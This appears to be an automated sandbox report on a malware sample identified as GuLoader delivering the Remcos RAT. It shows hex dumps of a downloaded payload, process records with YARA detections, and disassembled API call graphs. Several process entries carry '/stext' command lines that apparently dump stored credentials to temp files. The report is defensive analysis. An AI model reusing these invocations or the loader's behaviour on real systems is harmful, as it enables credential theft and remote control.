                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Content-Length: 493632
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    2025-01-08 16:13:13 UTC7969INData Raw: e2 29 6a aa 5d ba 9c 7a 1b e6 76 18 5d 67 d1 42 fc e1 92 9a fd aa d2 ce 2c 6c 0e c7 18 f0 2e f2 2a c3 25 dd 28 0c 11 99 50 cf 7d df b9 02 7c 68 0c 4d 56 5f fb 52 1b a7 15 ba 91 8f 58 94 3c bb c1 8b 9e 17 5d 6a 4a f1 9c 44 b1 f5 55 6d 9d 5b 1a 4f 48 0b 16 af 6d 73 86 38 5d 71 44 d9 ca 66 11 57 8a 0a a4 1c b7 31 f3 4c ba 73 dd 9d 6a 7d db ce c1 17 b3 ef 7e a0 73 32 4a 99 b2 f8 59 24 8c ca 83 6f 73 98 5c 3b e4 72 81 d3 f9 89 ad 69 f9 03 d6 1c c4 e1 b4 a6 1a a8 0f b7 6c 9e fd dd 68 78 0f 91 01 72 70 43 76 ba 59 7e 6f 3c 70 10 d3 fb 16 9c a8 33 9f ff f7 81 b5 5d 94 eb 2e f0 81 3d 40 e0 b6 0e 8f 0a 54 9e ab 1e 05 05 98 25 3e 96 e8 37 ea e5 61 78 88 d0 1a 86 5f 32 0f 63 4e 01 08 c6 4f 09 c4 ba 7c 68 01 21 83 79 76 ca 09 71 ec 85 03 1d 2c 07 43 76 b7 58 4e 32 b3
                                                                                                                                                                                                                                    Data Ascii: )j]zv]gB,l.*%(P}|hMV_RX<]jJDUm[OHms8]qDfW1Lsj}~s2JY$os\;rilhxrpCvY~o<p3].=@T%>7ax_2cNO|h!yvq,CvXN2
                                                                                                                                                                                                                                    2025-01-08 16:13:13 UTC8000INData Raw: ec fa fd 29 e6 d7 f0 98 3c 1b 20 2e 83 c9 c0 10 e4 32 1e 35 e2 48 82 d5 94 36 bb 69 0f 5a a9 81 b1 81 aa 49 6c 6e 1c 3c 1a f7 79 65 99 a0 54 07 eb 1f 6f 4c 88 ee 77 9f ed fb 8c f0 d1 9c f9 c6 bb c4 f3 96 5c eb 2b 11 57 96 0d c6 44 c4 db 82 97 65 52 37 f2 ce 7d f8 d5 23 0a 86 43 1e 0c 7a f8 0c c1 18 41 16 e5 0f 93 01 89 1e 58 d6 86 43 99 b3 42 e6 7f 23 84 d9 13 c4 12 48 bd e6 e2 79 47 75 8e 2c 70 7d e9 f5 da 3d ec 25 c7 14 17 86 8e d5 ae a0 41 3e 49 5d 4d 8b 49 e1 cd 06 fd 38 06 9b 27 8f 00 f5 0a a9 08 88 05 5f 6e db e8 f8 90 37 4c c5 15 5e 4c 19 81 10 14 19 fe 65 21 0f e1 69 6f b7 11 a3 e4 0a 08 9f 3f 6b 7c 53 09 df 91 3d 3f 74 19 1a 92 bb 84 e1 b2 3b 61 37 f6 e5 5b 5a 7b 5d 81 34 87 82 19 fd 0d 1b b6 5c db c2 93 69 7a e7 b9 b5 4e 22 a1 77 0c 33 2d 87 1b
                                                                                                                                                                                                                                    Data Ascii: )< .25H6iZIln<yeToLw\+WDeR7}#CzAXCB#HyGu,p}=%A>I]MI8'_n7L^Le!io?k|S=?t;a7[Z{]4\izN"w3-
                                                                                                                                                                                                                                    2025-01-08 16:13:13 UTC8000INData Raw: 1e a2 8d c6 75 f2 1f 02 a2 5e 9b 2f cf fb dc a4 3e 22 0b 09 b0 82 94 a4 1d 7c a6 a4 fe 15 d4 1e 08 44 c4 b2 6f 34 50 95 13 96 bc bf 03 ec af 86 9c 98 cc d1 f9 69 3c 34 02 1e 8b 04 e7 51 b0 75 25 d1 54 c9 19 a7 ca 87 a4 08 a2 ca 95 e4 03 d3 43 b3 6e 5d 37 fa e5 0e 05 2e e1 3a 93 58 a2 4a a0 cf b2 0e e8 b0 81 36 38 e7 f1 dc b7 0a 94 c4 96 3e 57 a2 c8 b2 3d 38 81 5d 69 d6 b5 31 4f c9 57 8f e7 f5 df 05 fd 80 9c b5 12 d8 b3 e3 5b 5c da 5a ff 97 20 36 4a 85 c5 c4 cd d1 a2 92 e8 7d 21 a3 50 80 da c7 81 17 80 38 b5 e7 90 26 35 e5 fd 4f 01 c6 cc 0c d2 77 f3 a4 3d a7 22 62 82 d0 86 cf c1 94 77 df 4d 60 23 62 1a c9 45 ec 81 a6 c7 d5 c6 17 13 a5 13 92 3a df 64 1d 71 a8 93 fe 6f 06 92 93 a3 62 51 91 7b 3a 59 b0 f2 e5 6b 30 59 58 dd f5 ca 02 37 ed 08 11 33 5e a0 3f 07
                                                                                                                                                                                                                                    Data Ascii: u^/>"|Do4Pi<4Qu%TCn]7.:XJ68>W=8]i1OW[\Z 6J}!P8&5Ow="bwM`#bE:dqobQ{:Yk0YX73^?
                                                                                                                                                                                                                                    2025-01-08 16:13:13 UTC8000INData Raw: dd 58 3b af 25 a2 30 be db fb 61 c6 20 89 ad a2 52 e1 92 89 bc 3d b0 d8 b0 59 7f 47 b4 db f7 47 06 46 42 dc 29 87 74 2e 70 1c d3 21 11 b5 93 d1 31 cd ca 30 a2 9a 71 b9 6f dc 07 0b d1 1c 32 56 dd a8 af 0a 4d 63 73 ab 38 a2 61 44 e2 df 39 cc 55 e6 0c cf 48 53 ea 61 ef 18 f7 58 0e 61 fb 02 50 0a 96 ba ea 53 dc 0f 25 ba 21 92 19 d6 20 df de 80 5f b6 3b 5d 98 a1 46 89 82 c1 99 35 bd cb 88 20 69 20 06 26 be 18 2f 97 8c a2 52 57 3a 18 6a 7b a3 cf b0 5d 22 a0 b6 e7 4d 31 88 6a f2 65 24 0d ba 34 b0 68 22 9e ad d9 65 c0 5a 55 78 cd 79 cd 0a 35 de 3f a8 6c 12 2a 7a bc 73 2f 5e 35 63 b1 a0 2a 47 33 5f 4b b6 6d d8 dd 5f 67 4b b4 38 74 20 77 8b 58 2d 12 03 83 bf 05 f9 67 74 63 a8 94 d3 d2 0b fd dc 79 22 72 c4 1c 82 b0 f0 92 8a 25 65 ad fe 48 15 b9 0e 08 a4 a7 19 8b 52
                                                                                                                                                                                                                                    Data Ascii: X;%0a R=YGGFB)t.p!10qo2VMcs8aD9UHSaXaPS%! _;]F5 i &/RW:j{]"M1je$4h"eZUxy5?l*zs/^5c*G3_Km_gK8t wX-gtcy"r%eHR
                                                                                                                                                                                                                                    2025-01-08 16:13:14 UTC8000INData Raw: ab 7d 7b 0e 3f 8c 66 f8 1f 51 15 53 20 4c 8b ea c2 40 9b 2f 67 56 14 6b 07 43 38 70 d1 e2 43 c1 15 22 57 37 53 24 40 76 a2 e5 9a 60 f1 f1 58 c1 3e 56 e8 64 03 6f c9 d0 a4 28 f9 43 c6 79 ad 87 5b f8 27 ac 1c e3 09 59 ca ad 26 f1 6a ba 45 8e c9 dd 47 37 0a 90 bf e9 5b 6e 3a 7f 38 ac ec 37 14 1f 54 88 76 09 20 3a b0 ce 2d 9d 2c 93 2c 1c bc 51 59 2f 89 1b 01 55 b6 38 1c b0 22 39 eb 10 38 4b 03 22 11 43 37 1d bf 13 8e 3a e9 84 23 d8 57 d2 64 fd 0d 33 14 37 9a 2f 44 7c 73 1f 61 82 13 3f 86 dc e6 5c a7 70 71 88 17 6e 86 e2 50 a8 71 fe 37 6c 5a f9 27 b4 dc 29 c8 c2 4b 77 35 a0 a3 73 5c 4a 33 4e 3a 19 19 f8 c8 4e 0a f3 c2 62 2f 86 6b a0 38 b4 50 92 f0 02 34 02 2f cf 1c 97 3d 92 93 9a c8 a8 1c 5f 8c 51 b3 45 bf 56 d9 4e 79 5e 0e b5 1a d5 d6 6f d4 78 b1 8b 9b 39 11
                                                                                                                                                                                                                                    Data Ascii: }{?fQS L@/gVkC8pC"W7S$@v`X>Vdo(Cy['Y&jEG7[n:87Tv :-,,QY/U8"98K"C7:#Wd37/D|sa?\pqnPq7lZ')Kw5s\J3N:Nb/k8P4/=_QEVNy^ox9
                                                                                                                                                                                                                                    2025-01-08 16:13:14 UTC8000INData Raw: 3b 19 6b 4a ea ae 98 43 b6 2f 50 c8 dc 92 e9 61 57 f8 d9 b3 0a 20 1a 5f 0b cf df a5 17 f7 4e 60 7b 19 5e 6e 18 af ba 43 9a 78 11 14 8b 97 10 3f 60 4b e1 b8 fa 35 7c 22 56 b8 16 3c cb d8 03 7d c1 a4 b6 dc 89 e5 64 32 23 98 72 94 bc 4f 00 cd a3 4d 8a 8e db a9 a8 6a 97 8f 77 3f 8c 65 86 70 55 bd 72 71 d8 be e2 38 86 04 5a 0b c9 80 f7 f2 0f 5d ee 5f 02 9e 5a 39 43 af 06 1d 85 69 7b da 15 a3 19 19 06 c4 a0 2a bb 0a 4d cc b5 66 8f 91 94 58 3e 1b 27 e9 eb cf 01 8c 52 20 95 7c 1d 28 56 27 ba b0 2e a2 2f 54 d4 63 9b da 93 fe a1 f9 cb 63 60 1a eb 43 86 63 d8 aa d7 e1 fd 05 3f 63 93 ba fe b9 40 0f 11 b2 36 0f be 75 28 ac 24 1a f9 44 4e c7 fc fd 4f bf 38 53 13 62 cf 52 95 6f 55 f3 47 01 47 45 68 1e 8e ab 3d 82 31 77 6a cc ed 79 71 0e 02 46 60 b4 4a ef 62 6f 53 f5 04
                                                                                                                                                                                                                                    Data Ascii: ;kJC/PaW _N`{^nCx?`K5|"V<}d2#rOMjw?epUrq8Z]_Z9Ci{*MfX>'R |(V'./Tcc`Cc?c@6u($DNO8SbRoUGGEh=1wjyqF`JboS
                                                                                                                                                                                                                                    2025-01-08 16:13:14 UTC8000INData Raw: c5 47 33 0b 08 ba 13 5b b7 b5 1e 2c 4f 7f 67 e2 f5 44 32 4c f6 88 ae 49 ff e0 de 1e bf bd 1f 9e 1c e3 29 40 28 d6 c0 a6 df 0b e6 59 f8 39 f5 d5 1c ab 7c a6 6b 67 fe 66 f8 74 74 7a f3 81 41 c4 7f fa db ef d1 51 05 a6 17 d5 83 76 7e 65 0d ef 6b ab 60 cd 20 b2 37 6f 04 a4 4d ee 52 85 6a 03 29 b5 8d a5 07 16 7b 7b ff 67 3f 1a 44 38 2f a4 f3 d6 b5 9f cf 6a 96 7d 6b c4 70 d5 bd 0b 16 5e fc 61 ca e4 df 4d 87 53 72 2f 61 5f d5 7f bb 4c ec a5 e1 50 41 22 ea 8e 4e 90 72 70 ff 2c e1 28 00 67 be 2f bc d0 c4 8d be c4 c1 78 5f 35 6a 8f d1 91 37 80 6e 19 27 fa e5 6b a1 12 f6 35 c1 a8 03 1c 2d 01 d6 d6 79 aa 5a e9 80 36 68 cb a0 8d ea 13 3f f2 a7 2f 35 5b f8 cb 44 0c 78 29 4b 33 a4 66 c9 20 76 f1 dd 37 64 86 46 28 e5 35 c8 99 5f 35 ca d1 83 5a fe 3a 1a 19 70 11 4e 0a fa
                                                                                                                                                                                                                                    Data Ascii: G3[,OgD2LI)@(Y9|kgfttzAQv~ek` 7oMRj){{g?D8/j}kp^aMSr/a_LPA"Nrp,(g/x_5j7n'k5-yZ6h?/5[Dx)K3f v7dF(5_5Z:pN
                                                                                                                                                                                                                                    2025-01-08 16:13:14 UTC8000INData Raw: a0 2f 8d 90 88 36 bd 8c a4 95 e0 9a 5b f9 1a 9d 5a 44 33 90 48 a0 71 2f 4a 37 01 a8 47 fd 5a c9 a9 5a f5 98 93 18 cb 31 f5 27 e9 22 46 80 c3 3c c4 96 69 df 93 15 95 49 11 b5 1d 90 17 6a f2 6b 34 dc 97 9e 7f 9f 3a b5 be b4 2b 96 13 e8 e9 3f 60 e9 4d d7 1d 88 88 8b 05 ee b5 e0 a1 39 80 90 35 60 f2 1e b0 d8 c5 32 40 41 cc 51 04 d1 08 42 7d 4a e9 9a b2 e1 5d 6f bf 6e 8f 8f de 48 f5 ff a7 13 aa fe bd 0f ad 9f 96 a4 27 1c 38 0f 11 b5 4b 8a 0f b9 3d 14 92 7d d1 b0 ec 18 80 00 68 77 01 c0 64 23 c6 bb 1f 24 73 c3 32 2a df bb 69 8c 15 ca 18 aa 28 86 af 12 1c c7 d3 27 7d 37 61 95 28 98 6f 2c a5 a2 bc 88 1a ba 9f ed 1e 9a 86 1e d8 56 10 02 19 0c 81 52 9a 04 06 b4 92 29 e6 4e 7b eb e3 cd 41 ad 43 bc ee 6a 7f 93 5e b0 05 f3 6f 93 86 22 a2 f2 e4 b8 77 35 7b 16 75 cf bb
                                                                                                                                                                                                                                    Data Ascii: /6[ZD3Hq/J7GZZ1'"F<iIjk4:+?`M95`2@AQB}J]onH'8K=}hwd#$s2*i('}7a(o,VR)N{ACj^o"w5{u
                                                                                                                                                                                                                                    2025-01-08 16:13:14 UTC8000INData Raw: 2a 1a 75 47 c4 91 ce 89 97 df 10 b8 18 4f 61 32 e7 30 e6 92 f5 b0 19 e8 2a 86 91 48 eb 0f 3c ba 29 35 0a ca 83 2f ab d1 7d e4 5d 76 9b 72 7f 6a ce 10 4e 7f b3 f7 e3 ec a1 bf 38 ca e2 67 e6 80 db a9 42 52 b3 1e 50 73 42 8d 21 b7 ea 3d 6c a1 0e f4 91 9b f8 4b 10 7f 99 39 9c 81 40 c8 d0 bc b6 90 12 ff c7 fe ac f5 f1 9f f9 d3 09 e7 74 92 a5 e2 49 d2 78 82 64 2b 16 37 f9 83 76 bf 19 c2 f8 aa 54 56 41 54 9d 31 f3 ad 41 d5 aa 8c 85 7d 11 c3 9a f9 32 64 6d a0 c9 d0 d6 86 ff bb c7 76 a4 ec b3 d8 19 d8 a0 7a ce b0 d5 c8 c1 e8 1c 01 ec d6 ba 39 81 a0 e2 90 cb a9 9c ba e2 70 28 4b ec 45 d7 52 f9 d4 ba 6b 69 4e 87 79 78 33 13 37 2e bd c5 83 d4 54 6e 48 51 90 c2 8e fb 49 3e 6a 98 10 4a 8a 80 f1 d3 50 7d c6 24 2f 77 1a d4 b8 6c 36 38 ab 26 7b c1 70 28 25 53 d0 88 e5 e0
                                                                                                                                                                                                                                    Data Ascii: *uGOa20*H<)5/}]vrjN8gBRPsB!=lK9@tIxd+7vTVAT1A}2dmvz9p(KERkiNyx37.TnHQI>jJP}$/wl68&{p(%S
                                                                                                                                                                                                                                    2025-01-08 16:13:14 UTC8000INData Raw: d1 af 68 9c 51 bf 17 03 d8 bb d2 d5 30 91 10 dd f1 0c e3 8b 28 b1 48 3b c2 9a b8 3e d6 61 eb f8 a9 0a 6a 3f 19 48 ca 4d c5 ad 9c b8 6c 5b ea 85 40 84 3b 77 0d 26 99 bc a6 de 09 60 9b 46 c8 99 fe 94 d9 49 6e 3c 87 03 9c ed d7 f5 9a 72 54 4d 1a f2 fa 51 08 b9 0a 6b 3a d1 92 c1 d5 52 d3 3c 67 55 2d f2 33 39 61 f2 c8 fe 39 58 6c a4 74 0b 42 2d dc 16 5a 09 40 1e 90 ae 5c cf 5e f9 7b 03 7b e3 80 95 29 f2 b6 92 aa 15 11 28 4e 66 b3 83 07 78 4f 34 5b 3b e9 58 0d fc 4e cc cf 84 b9 9a 02 f8 bc 1f 5a 22 88 0e 66 8d ae 2e 53 ed 9f 3b 13 cd a3 59 6b 46 d4 c8 c6 e5 e1 35 00 5e d1 12 1a 70 18 d9 36 71 5a a2 c7 af 78 ec 18 8b 37 95 18 b6 7a 9b 2d d6 77 30 72 fe 06 22 46 61 ce 65 82 94 1e c5 8c 0c 69 32 ed d5 4d d0 b2 69 ec 0d c8 a3 ab 72 9c 59 14 43 75 73 02 25 12 f3 34
                                                                                                                                                                                                                                    Data Ascii: hQ0(H;>aj?HMl[@;w&`FIn<rTMQk:R<gU-39a9XltB-Z@\^{{)(NfxO4[;XNZ"f.S;YkF5^p6qZx7z-w0r"Faei2MirYCus%4


                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:11:10:57
                                                                                                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5 hash:D82FC35769ADAC8D6C49087219B1CD93
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.27693002963.00000000028A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.27693286929.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.27693286929.00000000031B4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                    Start time:11:12:09
                                                                                                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5 hash:D82FC35769ADAC8D6C49087219B1CD93
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.32056932719.0000000002AF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28436005878.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.32066409158.0000000032B2F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.29410654098.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28486047899.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28453587511.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.32053389316.0000000001764000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.32053389316.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.29410560082.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:11:13:25
                                                                                                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\hqupnmxiqgofocirvgzrkof"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5 hash:D82FC35769ADAC8D6C49087219B1CD93
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:11:13:25
                                                                                                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\rsiinfhkeogkqiwvmrmsntajnt"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5 hash:D82FC35769ADAC8D6C49087219B1CD93
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:11:13:25
                                                                                                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe /stext "C:\Users\user\AppData\Local\Temp\umntoxsdzwyxawszvchuyguswzwofs"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5 hash:D82FC35769ADAC8D6C49087219B1CD93
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:15.7%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:13.9%
                                                                                                                                                                                                                                      Signature Coverage:19.9%
                                                                                                                                                                                                                                      Total number of Nodes:1515
                                                                                                                                                                                                                                      Total number of Limit Nodes:40
                                                                                                                                                                                                                                      execution_graph 4852 10001000 4855 1000101b 4852->4855 4862 100014bb 4855->4862 4857 10001020 4858 10001024 4857->4858 4859 10001027 GlobalAlloc 4857->4859 4860 100014e2 3 API calls 4858->4860 4859->4858 4861 10001019 4860->4861 4863 100014c1 4862->4863 4864 100014c7 4863->4864 4865 100014d3 GlobalFree 4863->4865 4864->4857 4865->4857 4027 4025c4 4028 402a9f 17 API calls 4027->4028 4033 4025ce 4028->4033 4029 40263c 4031 40263e 4038 405ff7 wsprintfA 4031->4038 4033->4029 4033->4031 4034 40264e 4033->4034 4036 405caa ReadFile 4033->4036 4034->4029 4035 402664 SetFilePointer 4034->4035 4035->4029 4037 405cc8 4036->4037 4037->4033 4038->4029 4873 402245 4874 402ac1 17 API calls 4873->4874 4875 40224b 4874->4875 4876 402ac1 17 API calls 4875->4876 4877 402254 4876->4877 4878 402ac1 17 API calls 4877->4878 4879 40225d 4878->4879 4880 40639c 2 API calls 4879->4880 4881 402266 4880->4881 4882 402277 lstrlenA lstrlenA 4881->4882 4886 40226a 4881->4886 4884 4051c0 24 API calls 4882->4884 4883 4051c0 24 API calls 4887 402272 4883->4887 4885 4022b3 SHFileOperationA 4884->4885 4885->4886 4885->4887 4886->4883 4888 4028c5 4889 402a9f 17 API calls 4888->4889 4890 4028cb 4889->4890 4891 402900 4890->4891 4893 402716 4890->4893 4894 4028dd 4890->4894 4892 4060bb 17 API calls 4891->4892 4891->4893 4892->4893 4894->4893 4896 405ff7 wsprintfA 4894->4896 4896->4893 4039 401746 4045 402ac1 4039->4045 4043 401754 4044 405c61 2 API calls 4043->4044 4044->4043 4046 402acd 4045->4046 4047 4060bb 17 API calls 4046->4047 4048 402aee 4047->4048 4049 40174d 4048->4049 4050 406303 5 API calls 4048->4050 4051 405c61 4049->4051 4050->4049 4052 405c6c GetTickCount GetTempFileNameA 4051->4052 4053 405c9d 4052->4053 4054 405c99 4052->4054 4053->4043 4054->4052 4054->4053 4897 401947 4898 402ac1 17 API calls 4897->4898 4899 40194e lstrlenA 4898->4899 4900 402577 4899->4900 4901 4022c7 4902 4022e1 4901->4902 4903 4022ce 4901->4903 4904 4060bb 17 API calls 4903->4904 4905 4022db 4904->4905 4906 4057b5 MessageBoxIndirectA 4905->4906 4906->4902 4055 10002709 4056 10002759 4055->4056 4057 10002719 VirtualProtect 4055->4057 4057->4056 4910 4045ca 4911 4045f6 4910->4911 4912 404607 4910->4912 4971 405799 GetDlgItemTextA 4911->4971 4914 404613 GetDlgItem 4912->4914 4920 404672 4912->4920 4917 404627 4914->4917 4915 404756 4969 404900 4915->4969 4976 405799 GetDlgItemTextA 4915->4976 4916 404601 4918 406303 5 API calls 4916->4918 4919 40463b SetWindowTextA 4917->4919 4923 405aca 4 API calls 4917->4923 4918->4912 4972 40415a 4919->4972 4920->4915 4925 4060bb 17 API calls 4920->4925 4920->4969 4928 404631 4923->4928 4930 4046e6 SHBrowseForFolderA 4925->4930 4926 404786 4931 405b1f 18 API calls 4926->4931 4928->4919 4935 405a31 3 API calls 4928->4935 4929 404657 4932 40415a 18 API calls 4929->4932 4930->4915 4933 4046fe CoTaskMemFree 4930->4933 4934 40478c 4931->4934 4936 404665 4932->4936 4937 405a31 3 API calls 4933->4937 4977 406099 lstrcpynA 4934->4977 4935->4919 4975 40418f SendMessageA 4936->4975 4939 40470b 4937->4939 4942 404742 SetDlgItemTextA 4939->4942 4946 4060bb 17 API calls 4939->4946 4941 40466b 4944 406431 5 API calls 4941->4944 4942->4915 4943 4047a3 4945 406431 5 API calls 4943->4945 4944->4920 4952 4047aa 4945->4952 4948 40472a lstrcmpiA 4946->4948 4947 4047e6 4978 406099 lstrcpynA 4947->4978 4948->4942 4949 40473b lstrcatA 4948->4949 4949->4942 4951 4047ed 4953 405aca 4 API calls 4951->4953 4952->4947 4957 405a78 2 API calls 4952->4957 4958 40483e 4952->4958 4954 4047f3 GetDiskFreeSpaceA 4953->4954 4956 404817 MulDiv 4954->4956 4954->4958 4956->4958 4957->4952 4959 4048af 4958->4959 4979 404a46 4958->4979 4961 40140b 2 API calls 4959->4961 4962 4048d2 4959->4962 4961->4962 4990 40417c EnableWindow 4962->4990 4965 4048b1 SetDlgItemTextA 4965->4959 4966 4048a1 4982 404981 4966->4982 4967 4048ee 4967->4969 4991 404523 4967->4991 4994 4041c1 4969->4994 4971->4916 4973 4060bb 17 API calls 4972->4973 4974 404165 SetDlgItemTextA 4973->4974 4974->4929 4975->4941 4976->4926 4977->4943 4978->4951 4980 404981 20 API calls 4979->4980 4981 40489c 4980->4981 4981->4965 4981->4966 4983 404997 4982->4983 4984 4060bb 17 API calls 4983->4984 4985 4049fb 